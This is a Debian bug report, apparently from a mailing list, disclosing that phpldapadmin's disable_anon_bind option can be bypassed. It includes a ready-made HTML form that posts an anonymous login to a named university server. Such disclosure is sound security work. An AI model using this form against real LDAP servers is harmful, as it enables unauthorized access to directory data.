Package: phpldapadmin Version: 0.9.6c-4 Severity: critical Tags: security Even if you deny anonymous login with disable_anon_bind anyone could access your LDAP server.
As I can see this option only hide checkbox from the input page, but anyone can create workaround hack: ==========example form to log into eol.lvk.cs.msu.su======== <html><body> <form action="https://eol.lvk.cs.msu.su/phpldapadmin/login.php"; method="post" name="login_form"> <input type="hidden" name="server_id" value="0" /> <input type="checkbox" name="anonymous_bind" checked /> <input type="submit" name="submit" value="login" /> </form> </body></html> ============================================================= I think, that version in sarge is also vulnerable to this trick. -- System Information: Debian Release: 3.1 APT prefers testing APT policy: (620, 'testing'), (600, 'unstable'), (550, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.11-1-686 Locale: LANG=ru_RU.KOI8-R, LC_CTYPE=ru_RU.KOI8-R (charmap=KOI8-R) Versions of packages phpldapadmin depends on: ii apache [httpd] 1.3.33-6 versatile, high-performance HTTP s ii debconf 1.4.30.13 Debian configuration management sy ii php4 4:4.3.10-15 server-side, HTML-embedded scripti ii php4-cgi 4:4.3.10-15 server-side, HTML-embedded scripti ii php4-ldap 4:4.3.10-15 LDAP module for php4 -- debconf information: phpldapadmin/ldap-bindpw: secret phpldapadmin/ldap-tls: false phpldapadmin/ldap-binddn: cn=admin,dc=eol,dc=lvk,dc=cs,dc=msu,dc=su * phpldapadmin/reconfigure-webserver: apache * phpldapadmin/restart-webserver: true phpldapadmin/ldap-basedn: dc=eol,dc=lvk,dc=cs,dc=msu,dc=su phpldapadmin/ldap-server: localhost * phpldapadmin/ldap-authtype: cookie -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
